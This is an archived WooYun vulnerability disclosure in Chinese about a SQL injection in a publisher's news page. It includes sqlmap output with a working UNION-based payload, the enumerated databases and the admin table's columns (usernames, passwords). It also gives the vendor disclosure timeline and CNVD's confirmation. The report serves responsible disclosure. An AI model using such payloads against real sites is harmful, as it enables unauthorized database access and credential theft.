乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-01: 细节已通知厂商并且等待厂商处理中 2015-11-05: 厂商已经确认,细节仅向厂商公开 2015-11-15: 细节向核心白帽子及相关领域专家公开 2015-11-25: 细节向普通白帽子公开 2015-12-05: 细节向实习白帽子公开 2015-12-20: 细节向公众公开
某人民出版社MYSQL注入漏洞
注入点:http://**.**.**.**/news_info.php?typeid=13&id=809通过sqlmap验证:
[13:59:51] [INFO] GET parameter 'typeid' is 'MySQL UNION query (58) - 1 to 10 columns' injectableit looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]GET parameter 'typeid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 257 HTTP(s) requests:---Parameter: typeid (GET) Type: UNION query Title: MySQL UNION query (58) - 10 columns Payload: typeid=-2639 UNION ALL SELECT 58,58,CONCAT(0x717a717a71,0x7a44535356575659634c,0x7176766271),58,58,58,58,58,58,58#&id=809---[14:00:44] [INFO] testing MySQL[14:01:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request[14:01:11] [INFO] confirming MySQL[14:01:12] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL >= 5.0.0[14:01:12] [INFO] fetching database names[14:01:12] [INFO] the SQL query used returns 2 entries[14:01:22] [INFO] retrieved: information_schema[14:01:22] [INFO] retrieved: peopledataavailable databases [2]:[*] information_schema[*] peopledataDatabase: peopledata[8 tables]+------------------+| ceo_admin || ceo_link || ceo_list || ceo_list_details || ceo_mboard || ceo_type || ceo_user || web_basic_info |+------------------+Database: peopledataTable: ceo_admin[12 columns]+-------------+--------------+| Column | Type |+-------------+--------------+| is_active | int(11) || u_id | int(11) || u_in_id | int(11) || user_date | varchar(250) || user_email | varchar(250) || user_mobile | varchar(250) || user_name | varchar(50) || user_pass | varchar(50) || user_qq | varchar(250) || user_right | varchar(250) || user_tel | varchar(250) || user_zw | varchar(250) |+-------------+--------------+
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-11-05 14:26
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。
暂无